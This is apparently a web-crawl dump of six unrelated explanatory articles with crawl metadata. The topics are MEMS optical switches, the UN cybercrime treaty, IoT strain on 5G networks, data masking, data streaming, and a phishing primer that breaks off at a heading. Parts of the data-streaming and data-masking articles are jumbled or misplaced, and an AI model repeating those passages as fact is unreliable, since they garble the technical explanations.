Commercial MEMS-based all-optical switches are based on one fundamental principle and two well-understood approaches. The principle is simple: The switch routes photons from one fiber-optic cable to another. The routing is accomplished by steering the light through a collimating lens, reflecting it off a movable mirror, and redirecting the light back into one of N possible output ports.The two basic design approaches for translating this principle into optical switches are a two-dimensional (2-D) or digital approach (N2 architecture) and a three-dimensional (3-D) or analog approach (2N architecture). Each approach has advantages and disadvantages, but the combination of both in distinct but complementary product lines provides a comprehensive range of optical-switching solutions.
The 2-D digital approach is so-called because the micro-mirrors and fibers are arranged in a planar fashion, and the mirrors can only be in either of two known positions (on or off) at any given time. In this approach, an array of MEMS micro-mirrors is used to connect N input fibers to N output fibers. This is called an N2 architecture, because it uses N2 individual mirrors. For example, an 8x8 2-D switch uses 64 mirrors (see Figure 1). A big advantage of this approach is that it requires only simple controls, essentially consisting of very simple, transistor-transistor-logic (TTL) drivers and associated electronic upconverters to provide the required voltage levels at each MEMS micro-mirror.Apart from a robust product line of NxN switches, including 4x4, 8x8, 16x16, and 32x32 ports, which use an input and an output fiber port, the 2-D planar approach supports the introduction of a third and fourth fiber port to a basic NxN switch (see Figure 2). That permits dynamic add/drop functionality, arrays of 1xN switches in a single package, and customized mirror configurations on the chip. These features allow an array of mirrors to replace yesterday's cumbersome, expensive, custom discrete switch integrations (see Figure 3) with small, hermetically packaged, robust, custom switching configurations (see Figure 4).
Although the simple 2-D design is inherently flexible, the greatest challenge in this approach lies in scaling switching to very high port counts. As port counts double, the distance the light must travel through free space squares. As the pitch of the micro-mirrors increases, the light-propagation distance increases and the diameter of the light beam grows, placing tight constraints on collimator performance and mirror-alignment tolerance. Such a tradeoff can rapidly become unmanageable, leading to very large silicon devices and low yields. Because of the length of the travel path for the signal, as well as the angle tolerance and angle uniformity required on the MEMS mirror itself, 32 ports are currently considered a top-end size for a single-chip solution in 2-D technology.
This is not to say that a 2-D approach is limited to 32 ports. On the contrary, there are exciting architectures, including the well-known Clos approach, that cascade smaller 2-D switches into a multistage architecture scalable to hundreds by hundreds of ports. An example is Siemens's Transexpress MODIF optical service node.In a 2-D approach, insertion loss is primarily attributable to three distinct factors: The coupling loss of the collimating lenses, loss due to Gaussian beam propagation, and loss introduced by mirror angle divergence from 90 degrees. Additional factors are mirror angle uniformity across the array and travel distance variations along non-uniform path lengths. Despite these factors, Optical Micro Machines (OMM) demonstrated insertion losses averaging <5 dB for its 16x16 switch systems.
Another benefit of the 2-D approach is the ability to move rapidly from development to high-volume manufacturing, while maintaining the optical performance of a hand-built component, coupled with the reliability and cost-effectiveness of a mass-produced product.
In many respects, the 3-D analog or beam-steering approach is actually very similar to the 2-D approach. It uses the same principle of moving a mirror to redirect light. The 3-D approach results in a 2N architecture, because two arrays of N mirrors each are used to connect N input to N output fibers (see Figure 5). But in this approach, each mirror has multiple possible positions-at least N positions (see Figure 6). This approach is much less constrained by the scaling distance of light propagation as the port count grows. Such architectures can scale to thousands by thousands of ports with low loss (potentially 6 dB or less) and high uniformity.
These advantages come at a price, however. Because the micro-mirror must have multiple possible positions, a sophisticated analog-driving scheme is implemented to ensure that the mirrors are in the correct positions at all times. Although MEMS technology can produce 2N 3-D mirror arrays with impressive stability and repeatability by using a simple open-loop driving scheme, closing the loop with active feedback controls is fundamental to achieving the long-term stability required in carrier-class deployment of an all-optical crossconnect. Using a closed-loop control scheme implies that monitoring the beam positions must be implemented in conjunction with computation resources for the active feedback loop and very-linear high-voltage drivers.
Of the many possible methods of actuating a MEMS optical switch, two have emerged as possible solutions for commercial optical products: electrostatic and magnetic.
The electrostatic method relies on the attraction of oppositely charged mechanical elements. It is one of the main actuation methods used for all types of MEMS devices. Its many advantages include repeatability, ease of shielding, and well-understood behavior.Magnetic actuation relies on attraction between magnets and typically one or more electromagnets. While magnetic actuation can generate larger forces with high linearity, the MEMS community generally has not taken to its use because of the complications of integrating the magnets and the near impossibility of shielding neighboring devices from actuator crosstalk. The shielding problem is particularly difficult in non-laboratory situations where, for example, someone might be running a large electric motor nearby, thus generating huge and repeated magnetic disturbances. Additionally, magnetic actuators on the MEMS scale have yet to prove reliable. Many developers are also concerned with hysteresis, both in the magnetic domain and in the structural properties of the magnetic materials.
The only way to ensure reliability is through long-term testing and field use. So far, electrostatic is the only mass-produced and fielded MEMS actuation method. For many years, a large amount of effort went into solving the problems of electrostatic behavior, and many products using electrostatic actuation have reached the market in demanding fields. A prime example is Analog Devices' electrostatic MEMS device found in most modern airbag systems. Modern electrostatic MEMS devices often have positioning accuracy measured in fractions of an angstrom (somewhat smaller than a single hydrogen atom), with reliability greater than that of the electronics supporting them.However, not everyone employs electrostatics due to its relatively low force potential. An appropriate structure combined with the right process is necessary to design structures that work well in this regime. If the structure is too stiff, for example, greater force may be needed, dictating the use of magnetic actuation. The MEMS designer makes tradeoffs, choosing either to accept the weaker forces of electrostatics or to fortify the system shielding and packaging and tackle the long-term reliability issues associated with magnetics. Because many open-ended questions remain in the use of magnetics, the electrostatic actuation method remains the optimum choice today for reliable devices required in high volumes.
Even when designers employ electrostatic actuation methods, optoelectronic packaging remains a considerable challenge. The traits that make MEMS so well matched with optical switching-most importantly, small size-can also present some of the biggest obstacles in making MEMS devices robust and manufacturable. With the compact scale of MEMS structures, a drop of water can seem like a typhoon and a speck of dust like a landslide. To keep these potentially destructive forces from causing harm, it is imperative to hermetically seal the MEMS chips. One solution is to integrate the electronics of a MEMs optical-switch subsystem with the optics and micro-mirrors in the same hermetically sealed ceramic packages (see Figure 7). This integration radically improves reliability and drastically simplifies manufacturabilityBy internally packaging the optics, whether it is collimating lenses or waveguides, they become considerably less susceptible to shifting or misalignment due to environmental effects that can wreak havoc on exposed optical components. But if the manufacturing process is not closely controlled, the benefits of internally packaging optics and electronics with the MEMS switch can be offset by new vulnerabilities introduced by the need for multiple fiber feedthroughs through the hermetic package. Each fiber or pin entering or exiting the package represents a possible point of compromise to the package's hermeticity. Careful attention must be paid to this issue in the manufacturing process.
The key to controlling manufacturing processes and ensuring hermeticity in the high volumes required for current and future applications is the development of automation in manufacturing. The manufacture of the actual MEMS-based switch core exploits established, highly automated silicon foundry processes in use for more than a decade. The remaining challenge lies in fiber integration and module packaging.
Automation is crucial before, during, and after optoelectronic packaging of MEMS devices to reduce cost and cycle time as well as improve product quality and consistency. For example, consider the full optical-performance testing of a 32x32 optical crossconnect with over 1,000 possible paths. Using traditional manual testing methods, this type of testing can take more than a week. OMM has developed in-house test equipment that performs a full optical-performance test in just a few hours.
While these hurdles remain in the path of full-scale deployment of MEMS-based all-optical crossconnects, advances in optical and silicon technology bring us closer to the goal every day. In January, field trials at an unmanned central office marked the first time that optical switches based on MEMS subsystems were deployed to carry live data traffic. OMM delivered a custom-configured rack-mount optical-crossconnect subsystem containing 4x4 and 8x8 all-optical-crossconnect switches for field trials by the National Transparent Optical Network Consortium (NTONC) at a network node in Oakland. NTONC includes Nortel Networks, GST Telecommunications, Sprint Communications, Lawrence Livermore National Laboratory, and San Francisco Bay Area Rapid Transit (BART).
The optical switches worked flawlessly for the complete duration of the trials. Although a relatively new technology, MEMS-based switching must be held to the same high standards as any critical network component. The field trials established MEMS's high reliability and excellent optical performance. The new age in optical switching has arrived.
Marc Fernandez is the director of business development for advanced products, and E. Kruglic is the principal MEMs designer at Optical Micro Machines Inc. (San Diego). | <urn:uuid:ae8ee3a2-56da-4948-b5ac-3b098ee37187> | CC-MAIN-2024-38 | https://www.lightwaveonline.com/optical-tech/transport/article/16648772/mems-technology-ushers-in-a-new-age-in-optical-switching | 2024-09-09T07:58:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00877.warc.gz | en | 0.921581 | 2,650 | 3.234375 | 3 |
The United Nations Ad Hoc Committee has approved a landmark, yet controversial, treaty on cybercrime. The agreement marks the first global effort to establish a comprehensive legal framework against cyber-related offences.
Initiated by Russia in 2017, the treaty faced significant opposition from digital rights groups, tech companies, and various UN member states. However, it was adopted after three years of negotiation and will enter into force once ratified by at least 40 member states.
The treaty introduces broad powers for law enforcement agencies, including the ability to compel service providers to disclose electronic data and facilitate international cooperation in cybercrime investigations. While it aims to tackle serious crimes, such as child sexual abuse, money laundering, and online exploitation, the treaty has raised significant concerns among human rights organisations.
Critics argue that authoritarian regimes could exploit it to suppress freedom of expression and crack down on dissidents, journalists, and activists. The treaty’s provisions allowing cross-border data requests without robust safeguards may lead to abuses and heightened state surveillance. Industry should consider practical steps to ensure they are informed about the treaty’s potential impact on their operations.
Key elements of the treaty
- Global Legal Framework: Establishes the first comprehensive international legal framework for combating cybercrime, focusing on enhancing global cooperation among member states.
- Criminalisation of Cyber Offences: Mandates member states to criminalise activities such as illegal access to information systems, data interference, system interference, misuse of devices, and cyber-enabled forgery and fraud.
- Protection of Children Online: Includes specific provisions against online child sexual abuse and exploitation, including the production, distribution, and possession of such material, as well as solicitation and grooming for sexual offences.
- International Cooperation: Facilitates cross-border collaboration, including sharing of electronic evidence, mutual legal assistance, and expedited preservation of data for investigations.
- Human Rights Safeguards: Contains provisions to ensure that the implementation of the treaty does not infringe on fundamental human rights, including freedoms of expression, privacy, and data protection.
- Jurisdictional Rules: Establishes guidelines for member states to assert jurisdiction over cybercrimes, including crimes committed within their territory or affecting their nationals.
- Real-Time Data Collection: Empowers states to implement measures for the real-time collection and interception of traffic data and content data during investigations.
- Legal and Procedural Measures: Requires member states to adopt legal frameworks that allow for the seizure, freezing, and confiscation of assets related to cybercrime.
- Liability of Legal Entities: Stipulates that both individuals and legal entities can be held liable for committing or participating in cybercrimes.
- Capacity Building and Technical Assistance: Emphasises the need to provide technical assistance and capacity-building to help developing countries combat cybercrime effectively.
Practical steps for industry
- Review and Assess Compliance: Companies, particularly in the tech sector, should closely examine the treaty’s requirements to ensure compliance, especially regarding data preservation and cooperation with law enforcement across borders.
- Monitor Legislative Developments: As the treaty progresses to ratification, it is essential to monitor how individual countries incorporate its provisions into national law, as this will impact enforcement practices and potential liabilities.
- Engage in Advocacy: Companies should consider joining industry coalitions or engaging with policymakers to advocate for stronger safeguards that protect human rights and privacy, ensuring that any domestic implementation of the treaty does not lead to overreach or misuse.
Access Partnership works closely with businesses and governments to drive innovation and ensure fit-for-purpose regulation. To learn how your business can capitalise on the implications of the UN’s new cybercrime treaty, please contact Mark Smitham at [email protected], Ethan Mudavanhu at [email protected], or Christopher Martin at [email protected]. | <urn:uuid:1184a340-b27b-452a-8aaf-f314ea5a9685> | CC-MAIN-2024-38 | https://accesspartnership.com/access-alert-un-approves-controversial-cybercrime-treaty/ | 2024-09-13T03:05:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00577.warc.gz | en | 0.923791 | 776 | 2.84375 | 3 |
The Internet of Things (IoT) has become ubiquitous, and the number of connected devices is expected to grow to 29.3 billion by 2023. Millions of new devices go online each year at the start of the school year and after the holidays, and you can even watch the popularity of IoT devices fluctuate with the seasons. These devices are becoming more integral to daily life as they bring power to our homes, streamline our work processes and make communications more convenient.
When adopted at scale, these devices require faster networks with higher capacities to fulfil their connectivity needs. And while IoT has already found use in many business sectors — providing information, automation and other services that wouldn’t have been possible before — many organizations overlook the challenges IoT devices pose to 5G networks when it comes to securing network architecture. As someone whose company works with advanced AI algorithms that monitor and protect IoT devices, the following are some of those challenges I have seen posed by IoT devices to 5G networks.
Increase in Bandwidth Needs
In very simple terms, the internet is a combination of networks, which are administered by various public and private organizations and facilitated by a collection of internet exchange points (IXPs). This distributed structure makes the internet resilient and robust, but the exponential increase in bandwidth requirements and capacity in 5G networks (due to higher IoT device numbers) might become a significant issue for IXPs in the coming years.
With the growing demand and use of cloud computing, the need for bandwidth and internet speed will also increase. This is extremely relevant when we talk about IoT devices, as some manufacturers try to solve IoT security issues by only connecting devices through the cloud. Failure to address these needs as 5G rolls out might create issues for a significant number of internet users and businesses.
Digital Infrastructure and Interdependence
Due to the far-reaching and transformative nature of IoT-based projects and their intrinsic complexity, poorly implemented industrial IoT solutions might create infrastructural risks for network service providers. The digital infrastructure creates many interdependent processes that depend on connectivity.
As more industrial IoT devices go online and factories further automate their operations, entire production lines might be negatively affected if a single type of sensor becomes vulnerable to cyberattacks. A sophisticated denial-of-service (DoS) attack on such devices might cause a cascade effect and create service gaps. It is vital that leaders deliver appropriate support and service concerns to IoT teams.
These potential issues are a challenge to both network operators and infrastructure and operations (I&O) leaders, who must carefully assess the needs and potential issues of the IoT projects under their control. Their responsibilities go beyond evaluating cloud dependencies and infrastructural needs for daily operations, and they must include worst-case security scenarios such as mirrored DDoS attacks on devices.
The radical transition of most industrial sectors to 5G networks is the driving factor for the near future growth of massive data exchange. With the growing popularity and demand of IoT technologies, data management becomes more complex for 5G networks.
Most of the new IoT devices will be small, relatively powerful and low cost, making them prolific. Add to this the fact that industrial IoT devices are expected to work for many years, even when placed in harsh environments, and the growing bandwidth and security demands posed by these devices will only accumulate over time. Industrial IoT might also reveal key infrastructural weak points that do not have the capacity to handle this increasing demand.
As for consumers, they are less likely to take full advantage of 5G networks in terms of IoT connectivity than municipalities or large industrial operators; however, any emerging IoT risks to network stability would be felt in the consumer segment whenever network infrastructure is impacted.
As 5G technology extends the devices’ mobility with IoT technologies, securing data is becoming more vulnerable than ever before. New antennas will allow a much larger number of devices to connect to the same network node, making them more susceptible to attacks. Therefore, good IoT security practices should require unique authentication methods and strict access management on the gateways to mitigate some threats to the network. Protective measures are vital to safeguard the networks’ integrity and mitigate the evolving 5G security-related challenges.
How to Strategically Address Emerging IoT Capabilities
There are several things that can improve our readiness to deal with IoT issues. First and foremost, key internet infrastructure has to be assessed and made ready to handle the bandwidth spikes created by massive IoT botnets. This might require building in more redundancies or simply expanding capacity at key points in the infrastructure.
On the consumer side, more easy-to-use gateway management solutions and protections, such as firewalls, would greatly improve IoT security. Many consumers and businesses do not have a clear and easily accessible way to audit their local networks for unknown or rogue devices. Few can detect new and suspicious connections. These types of network management solutions are usually present on well-managed enterprise networks, and there is no real reason not to provide them to SMBs or the average consumer in 2021.
The bottom line is that the impact of IoT devices on 5G networks will become more prominent in the coming years. These and other challenges show how IoT could hamper the performance of 5G networks, and why both network service operators and their largest clients need to address emerging IoT capabilities strategically.
Einaras von Gravrock, CEO of CUJO AI, the only AI cybersecurity solution currently deployed on 1B connected devices. Acclaimed by World Economic Forum, Gartner. | <urn:uuid:1ff3574d-c4d7-4e13-a5fc-2a7d19d8fb08> | CC-MAIN-2024-38 | https://www.asiaautomate.com/post/challenges-to-5g-networks-from-iot-devices | 2024-09-13T01:42:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00577.warc.gz | en | 0.948263 | 1,112 | 2.640625 | 3 |
What is Data Masking?
Data masking is a method used to protect sensitive information by making it unreadable to unauthorized users. However, this altered data still retains its usability for authorized purposes. Think about a book where all the names and addresses are replaced with fictional ones, but the story remains the same. That’s similar to what data masking does—changing the details without losing the overall structure.
Why is Data Masking Important?
- Protection of Sensitive Information: One of the most critical reasons for data masking is that it prevents personal identifiable information (PII) from falling into the wrong hands. Suppose a company’s database has been hacked. In such a case, masked data becomes futile to a hacker as there will not be any correct personal particulars available in it. This reduces identity theft risks and financial fraud possibilities.
- Compliance with Data Protection Regulations : To safeguard personal data, organizations must follow rules such as Europe’s General Data Protection Regulation (GDPR) or America’s Health Insurance Portability and Accountability Act (HIPAA). Failure to do so may attract hefty fines, hence the need for compliance. Therefore, it ensures that no one who lacks authority can access sensitive information.
- Maintaining Data Integrity for Testing and Development: Using actual customer data for software development and testing can be very risky. Still, developers need something that looks and behaves like real stuff to test systems properly. This keeps tests realistic, although non-sensitive, by ensuring that only realistic but not accurate customer information gets used for tests, thus keeping them credible without exposing actual customer information.
Types of Data Masking
- Static Data Masking: In this, a database copy is created, where everything except sensitive data is permanently replaced with masked values. The masked copy can then be used for testing, analytics, or any other purpose while the original remains safe.
- Dynamic Data Masking: Here, information is concealed on the fly as it is accessed; authorized users view actual data, while those without authorization see only its masked version. Such scenarios may require the records to stay secure but remain accessible to some people.
- On-the-Fly Data Masking: This approach involves masking transferred pieces between different systems or environments, often when data needs to be shared with external parties or moved into less secure surroundings.
How Data Masking Works
The purpose of data masking is to modify information so that it becomes meaningless to unauthorized persons. Identification of the target data, application of a method for masking and substitution of initial values with modified ones are usually involved in this technique. To illustrate, someone’s true name might be altered as “John Doe” within the database for privacy reasons.
Common Data Masking Techniques
- Substitution: This technique involves replacing accurate data with realistic but fictional data. For example, a real customer name might be replaced with a randomly generated name that follows the same format. This allows the data to remain usable while protecting sensitive information.
- Shuffling: This technique shuffles entries within datasets without changing their formats; for instance, phone numbers in a list could be rearranged so that they no longer correspond to respective persons who should know something about them. It obscures facts while retaining structure (i.e., keeping records intact).
- Encryption: Encryption and data masking are two completely different things. However, encryption can be used as a strategy to protect data in transit or storage.
- Redaction: Redaction involves removing or obscuring specific data parts, like how sensitive document information might be blacked out. This technique is often used when details must be hidden entirely while showing other parts of the data.
When to Use Data Masking?
1. Software Development and Testing
Testing and development during the software development process require it . Developers need realistic data to test their applications, but using customers’ actual data may be dangerous. Masked data provides a safe option that still acts like the real thing.
2. Outsourcing and Third-Party Data Sharing
Whenever companies outsource tasks or share their information with third-party vendors, they risk exposing sensitive materials. It helps control this risk by ensuring that what gets shared is not sensitive but still valuable for the vendor’s intended use.
3. Analytics and Reporting
Organizations frequently analyze records to gain insights and make decisions. However, analyzing such information presents security challenges because it may lead to the leakage of personal details not meant for public knowledge. With this approach, businesses can perform analytics on representative, accurate information without revealing private facts.
4. Employee Training
It is necessary to train staff members, especially those in technical support and customer service roles, to use realistic scenarios based on actual client figures. It enables trainers to do so without compromising confidentiality; thus, no accurate client information shall be disclosed during training sessions.
Benefits of Data Masking
1. Enhanced Data Security
The most noticeable advantage of this technique is that it increases data security by denying access rights to unauthorized individuals who might have illegally gained entry into an organization’s database system. Even if they succeed, they won’t see anything meaningful since everything will appear scrambled, hence useless to them.
2. Reduced Risk of Data Breaches
Data breaches can lead to severe financial loss and damage to a company’s reputation. Masking information minimizes the chances of such incidents occurring since whatever gets exposed would be of no use whatsoever to an attacker.
3. Improved Compliance
As stated before, compliance becomes more accessible when one uses it as part of their overall strategy toward GDPR, HIPAA, and other related rules. Therefore, penalties are avoided, and customers’ trust in their provider’s ability to handle personal records responsibly is built upon.
Challenges in Data Masking
1. Maintaining Data Usability
The issue here lies in how much change should be made within masked data so that it remains usable without compromising its purpose, such as testing or analysis. For instance, if too much manipulation is done, the required results may not be achieved.
2. Performance Considerations
Dynamic data masking can impact system performance. Masking data in real time requires higher processing power, which can slow down applications or databases.
3. Keeping Up with Evolving Regulations
Organizations operating globally need help keeping pace with changing laws governing information protection. What may have been complaint yesterday might become illegal tomorrow, complicating matters further, especially when dealing with multiple regulatory frameworks simultaneously.
Best Practices for Implementing Data Masking
- Identifying Sensitive Data: The first step in data masking is identifying which data needs to be masked. This typically includes personal information, financial details, and any other data that could be considered sensitive.
- Choosing the Right Masking Technique: Different masking techniques are suited to various scenarios. Substitution might protect names and addresses, while redaction is ideal for hiding specific details in documents.
- Automating the Process: By automating various parts involved in applying this approach across systems, we ensure consistency alongside accuracy, without which human error tends to appear frequently, leading to ineffective results attainment.
- Regular Auditing and Updating: It is not a one-time task. Regular audits should be conducted to ensure that masked data remains secure, and that new data is appropriately protected. The masking strategy should be updated accordingly as regulations and business needs evolve.
Data Masking vs. Encryption
Encryption and data masking perform the same function of protecting data, but they do so differently. It makes the information unreadable for unauthorized parties while keeping it practical for specific uses like testing or analytics. On the other hand, encryption changes data into a code that can only be understood with a key, therefore securing it against unauthorized access.
When to Use Each Method
Generally, people use data masking when there is still need to access raw details without showing them; this might occur during software testing or analytics processes among others. Storage or transit protection that needs to remain entirely secure on any account forms the best utilization of encryption technique.
For added safety measures, you may use these two together: encrypt first, then mask afterward. This will give you another level of security in your systems, with sensitive records such as personal identification number (PIN) codes handled by financial institutions, for instance.
Real-World Examples of Data Masking
1. Healthcare Industry
It is often used in the healthcare industry to protect patient information. For example, a hospital might use data masking to create a database for research purposes, replacing all patient names and social security numbers with fictitious ones.
2. Financial Services
Banks and financial institutions frequently use it to protect customer information. For instance, a bank might mask credit card numbers in their database to ensure that the masked credit card numbers would be useless to the attacker even if the data is breached. This practice helps protect both the bank and its customers from potential fraud.
E-commerce companies handle sensitive customer data, such as addresses and payment information. Moreover, it can protect this information when it’s used for purposes like analytics or reporting. For example, a company might mask customer names and payment details before analyzing purchase trends, ensuring that no sensitive data is exposed during the analysis.
Data Masking ensures that private information remains confidential while allowing different uses of such data, such as testing and analytics, among others. Businesses should know how, where, and when each type or technique should be applied based on what exactly they want masked since this will help them meet required standards and protect their systems from unauthorized access, which might lead to non-compliance with regulations.
Share this glossary | <urn:uuid:ac590483-a717-46bb-9e83-8d18bcbdffbc> | CC-MAIN-2024-38 | https://kanerika.com/glossary/data-masking/ | 2024-09-15T14:43:04Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00377.warc.gz | en | 0.920488 | 1,983 | 3.65625 | 4 |
What is Data Streaming?
Data streaming is the process of generating data from multiple sources and consortia of incoming data almost instantaneously. It is different from batch processing, where the data is gathered, loaded, and batch-processed somewhere later. In the case of data streaming, one can analyze and act on the data almost immediately after it has been produced. This approach becomes helpful in scenarios where real-time information is required, such as trading applications, social media analytics, and surveillance.
However, the need for data streaming is emphatic due to the need for real-time data, which is needed to make fast-paced decisions in modern-day environments. Sectors like finance, healthcare, e-commerce, and media use data streaming to increase user satisfaction, prevent financial fraud, improve processes, and innovate.
How Data Streaming Works?
Data streaming is the ongoing transmission of data from certain data sources to certain data processing systems, which commence analysis upon receiving the data. It all starts with data producers, such as social networks, transaction systems, or sensors, generating steamtable data at a very high rate. That data then goes into a data stream, which carries records indefinitely toward a system for processing.
What are the Key Components of a Data Streaming System?
- Message Brokers: Tools such as Apache Kafka act as intermediaries, conveying data between producers and consumers.
- Stream Processors: Systems like Apache Flink or Spark Streaming are used for real-time data analytics. These systems receive data streams, filter, aggregate, and transform them while the data transitions.
With its real-time processing capabilities, data streaming offers a more flexible and faster approach than traditional methods. Unlike the latter, which involves collecting and processing data at intervals, data streaming allows for immediate processing. This is particularly significant in fraud detection, where the ability to process data in real-time can profoundly impact.
Key Technologies and Tools for Data Streaming
1. Apache Kafka
Apache Kafka is a central technology for designing and implementing real-time data streaming applications. Initially developed by LinkedIn, it is an open-source distributed event streaming platform that provides many features, such as high bandwidth and low latency in data transport. It serves as a message broker by working between data providers (the sources producing the data) and their consumers (the applications or services processing that data). Scalability and fault tolerance are other areas where Kafka excels.
2. Apache Flink
Apache Flink is an effective stream processing framework supporting batch and real-time data processing. It excels in complex event processing (CEP) and provides in-memory processing capabilities, allowing for real-time analytics with low latency.
Unlike other stream processors, Flink’s stateful stream processing is well suited for applications that require context or knowledge to be retained for them to operate, such as fraud detection and real-time recommendations.
3. Apache Spark Streaming
Apache Spark Streaming represents an implementation of Apache Spark that supports the real-time processing of data streams in a distributed, fault-tolerant, and higher throughput manner. Each data stream in Spark Streaming is divided into small micro-batches, which solves the drawbacks of traditional batch and streaming modes. One such limitation can be overcome by allowing it to work with the rest of the ecosystem, including Spark SQL and MLlib, for advanced data analysis and machine learning.
4. Amazon Kinesis and Azure Stream Analytics
These are cloud-based data streaming services that AWS and Microsoft Azure provide. With a real-time data streaming framework, application developers can use Amazon Kinesis to provide real-time stream processing, where they can collect and analyze data instantly. Azure Stream Analytics offers similar functions but emphasizes combining such capabilities with other Azure services. Hence, it facilitates the development of cloud-based end-to-end streaming solutions.
Applications of Data Streaming
1. Real-Time Analytics
Real-time data stream processing enables businesses to volumize data and analyze patterns immediately. This is very important in industries such as finance, where real-time data analysis helps identify cases of fraud or market changes, which then helps businesses adjust to the environments.
2. IoT Data Processing
The Internet of Things (IoT) is defined by the sheer volume of data generated by intelligent connected devices. Streaming allows users to work with this data rather than store it, facilitating timely activities and events such as health care monitoring, equipment maintenance, and factory and home automation.
3. Financial Services
In the financial market, streaming data is essential for real-time stock price monitoring, algorithmic trading, and dynamic portfolio management. For example, hedge funds use continuous data streams to make split-second trading decisions, optimizing profit potential by reacting instantly to market fluctuations. This real-time processing enhances decision-making and reduces the risk of losses.
4. Media Streaming
Entertainment networks such as Netflix, Spotify, and YouTube for audio content employ data streaming staff to deliver video or audio to audiences almost as fast as the media is recorded. This allows consumers to enjoy the service without any loss in value despite fluctuations in demand or supply.
5. Event-Driven Architectures
Data streaming is crucial for these systems, as any event triggered by an application must prompt a response from the system. This is particularly beneficial for real-time inventory management, order fulfillment, and customer customization in e-commerce.
Benefits of Data Streaming
1. Real-Time Process
Streaming data makes it possible to analyze and digest information in real-time. Hence, business processes can be handled without delay. This is essential, especially in situations that require prompt attention, such as checking for fraud or tracking activities live.
Platforms like Apache Kafka and Amazon Kinesis are prime examples of the scalability capabilities of data streaming. They can process large data volumes and scale out, allowing for growth without compromising performance.
3. Better Decision Making
Data in motion allows organizations to process information faster and invest more rationally. With real-time insights, organizations can act before changes occur or respond when situations change.
4. Even better User Experience
In media streaming services, data streaming facilitates uninterrupted content watching by eliminating lags and room for buffering. User experience has improved, and the engagement level has increased, which is necessary to keep up with the competition.
5. Cost Efficiency
Data streaming’s cost efficiency is a significant advantage. It eliminates the need for storage, especially for large requirements and batch systems, potentially saving on infrastructure costs and optimizing resource utilization.
Challenges in Data Streaming
- Data Quality and Consistency
The integration of data streaming will advance alongside AI and machine learning. Data quality in actor systems is dynamically maintained, as ways need to be constructed to take care of incomplete data streaming information.
- Latency and Performance
Real-time latency, a critical requirement in real-time applications, presents significant challenges. Achieving this level of latency is often hindered by factors such as network congestion, suboptimal hardware, or inefficient processing algorithms.
With the increase in streaming data, systems should also be able to expand to manage the added burden without affecting their performance. This calls for proper structural design and resource management.
- Complexity in Implementation
Data streaming infrastructure for data management involves setting up and maintaining several message exchanges, storage, and stream processing components.
- Security and Privacy Concerns
When sensitive data is being streamed, it is crucial to implement robust security measures. This is especially true during data acquisition, where careful security considerations are paramount to ensure data privacy is maintained.
Future Trends in Data Streaming
1. Incorporation of AI and Machine Learning
2. Edge Computing
The development of edge computing will move data processing to the closest possible location, resulting in reduced bandwidth usage and latency. This trend is especially crucial in IoT applications since data must be processed almost immediately.
3. Enhanced Data Security
With data streaming receiving wide acceptance in organizations, there will be a growing concern over the secure transfer of such data. To shield confidential records, more sophisticated encryption methods and better identity verification systems will be adopted.
4. Hybrid Cloud Solutions
Hybrid cloud computing, which integrates cloud and on-premises streaming architecture, will be embraced to provide organizations with flexibility and enable them to address the ever-increasing data requirements.
5. Improved Data Observability
Further, new applications or systems will emerge that are meant to more efficiently form data observability in streaming pipelines.
Organizations tend to embrace this technology to solve the problem of data and its management problem, which helps them analyze and come up with accurate conclusions. As new technologies come forth, AI and data security will shape the future of streaming data. Therefore, it will be an effective weapon in any business. Therefore, since wanting to receive information instantaneously is likely to increase, paying attention to these trends and assessing their effectiveness and ineffectiveness will be crucial in remaining competitive in the changing world.
Share this glossary | <urn:uuid:5ba6bff5-8de1-4210-92cc-97180fd019f8> | CC-MAIN-2024-38 | https://kanerika.com/glossary/data-streaming/ | 2024-09-15T12:19:49Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00377.warc.gz | en | 0.919317 | 1,840 | 3.375 | 3 |
Even if you aren’t very much into cybersecurity and are not particularly tech-savvy, you’ve probably heard about the term phishing. But, do you know how it works and what the most common forms of phishing are?
It’s estimated that around 15 billion spam emails are sent out daily. More worryingly, on average, one in every 99 emails is a phishing attack, meaning that the overall attack rate is just over 1%.
And, to add to this, around 90% of all breaches occur due to phishing. All of these numbers speak to just how important it is to know how phishing works and what the best protection practices against it are.
In this detailed page, we’ll go over various forms of phishing, the differences between them and share with you examples of phishing emails to help you understand everything you need to know about this cybersecurity threat.
What Does Phished Mean?
The first step in protecting against phishing is understanding what it is and how it works. So, what is the meaning of phished, and how do you get phished? In simple terms, phishing is a form of social engineering attack attackers employ to steal your personal data.
In its essence, phishing is a very simplistic form of attack. It revolves around tricking the target victim by impersonating a trustworthy source. Trusting the sender, the victim unknowingly infects their device with malware, freezes their system, or shares sensitive information they wouldn’t reveal to strangers.
Depending on the severity of the phishing attack, there could be very serious consequences for the victim. The target might experience identity theft or lose all of their money. When it comes to who the targets are, anyone can fall prey to such an attack. Moreover, phishing doesn’t only affect individuals. It’s also a common occurrence in the business world.
What is Email Phishing?
Most phishing attacks are carried out through emails, so it’s key to highlight this method in order to help you recognize it. The process is fairly simple. Email phishing techniques involve attackers registering fake domains and creating fake credentials that resemble those coming from legitimate sources.
For example, you might get an email impersonating your bank’s support agent or a representative urging you to change your password, click on a link to fill out some information, or simply download some attachments featuring the latest updates.
Many unsuspecting people assume that, just because the email seems to come from a recognizable address, it’s safe to interact with. However, to avoid getting phished through an email link or attachment, always make sure to double-check the sender’s email address and make sure the email is genuine.
Example of Phishing Attack
While this phishing example is the most common one that affects online users, there are many other types of phishing that you should be aware of. To help you recognize other prevalent types of phishing, let’s quickly highlight them:
- Smishing- this form of phishing replaces email communication with SMS. It involves the cyber attackers sending the victim a similarly-crafted message with a link or attachment, urging them to click on the content of the SMS.
- Vishing - like the previous form of phishing, this includes targeting the victim’s phone, but this time through a voice message. The attackers leave voice messages trying to induce the victim to reveal valuable personal or financial information.
- Angler Phishing - Angle phishing has become increasingly prevalent in today’s era of social media. Attackers disguise themselves as company representatives or customer service agents to obtain personal info, account credentials, or other data of other social media users
What's Spear Phishing?
